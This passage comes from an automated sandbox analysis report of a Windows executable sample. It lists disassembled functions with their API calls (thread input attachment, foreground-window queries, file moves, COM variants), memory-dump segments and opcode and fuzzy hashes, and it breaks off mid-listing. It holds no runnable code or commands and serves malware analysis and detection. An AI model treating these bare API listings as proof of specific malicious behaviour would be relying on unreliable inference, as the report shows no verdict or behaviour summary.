                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3771399671-0
                                                                                                                    • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                    • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                                                                                    • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                                                                                    • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                                                                                    Function 00434621 Relevance: 15.1, APIs: 10, Instructions: 98threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                                                                                    • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2156557900-0
                                                                                                                    • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                    • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                                    • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                                    • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                                    Function 0046943F Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 287COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                    • API String ID: 0-1603158881
                                                                                                                    • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                    • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                                    • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                                    • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                                    Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateMenu.USER32 ref: 00448603
                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                                    • IsMenu.USER32(?), ref: 004486AB
                                                                                                                    • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                                    • DrawMenuBar.USER32 ref: 004486F5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 161812096-4108050209
                                                                                                                    • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                    • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                                    • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                                    • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                                    Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                    • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                                                                                    • Opcode Fuzzy Hash: dfbce8e1a613c74e072c21ad89e7d3e14579d4917e2b3053f757fec35ca8a5d3
                                                                                                                    • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                                                                                    Function 004561DA Relevance: 13.7, APIs: 9, Instructions: 164COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                    • Instruction ID: d12da5a9263b129e99c802cec43d72d92cc496201e336192e500ad81068e5f87
                                                                                                                    • Opcode Fuzzy Hash: b2351d13dc7e01734d52893050a6426585663f8e33c7fb02d488baa67b0c7faf
                                                                                                                    • Instruction Fuzzy Hash: D7519C70600305ABEB20DF69CC81F9B77A8AB08715F50462AFE05DB3C1E7B5E8588B58
                                                                                                                    Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                      • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 978794511-0
                                                                                                                    • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                    • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                                                                                    • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                                                                                    • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                                                                                    Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                    • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                                                                                    • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                                                                                    • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                                                                                    Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClearVariant
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1473721057-0
                                                                                                                    • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                    • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                                                                                    • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                                                                                    • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                                                                                    Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove$_memcmp
                                                                                                                    • String ID: '$\$h
                                                                                                                    • API String ID: 2205784470-1303700344
                                                                                                                    • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                    • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                                                                                    • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                                                                                    • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                                                                                    Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                                    • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                                    • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                                    • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                                    • __swprintf.LIBCMT ref: 0045EC33
                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                                    Strings
                                                                                                                    • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                                    • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                                    • API String ID: 2441338619-1568723262
                                                                                                                    • Opcode ID: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                    • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                                                                                    • Opcode Fuzzy Hash: 35eb9c3aeff660f135fd63a8918d5c45c4a90ea0b18b9c33d96ad8571bc730e4
                                                                                                                    • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                                                                                    Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                    • String ID: @COM_EVENTOBJ
                                                                                                                    • API String ID: 327565842-2228938565
                                                                                                                    • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                    • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                                                                                    • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                                                                                    • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                                                                                    Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                                    • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                                      • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                                      • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                                    • String ID: H
                                                                                                                    • API String ID: 3613100350-2852464175
                                                                                                                    • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                    • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                                    • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                                    • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                                                                                    Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                                    • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                                    • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
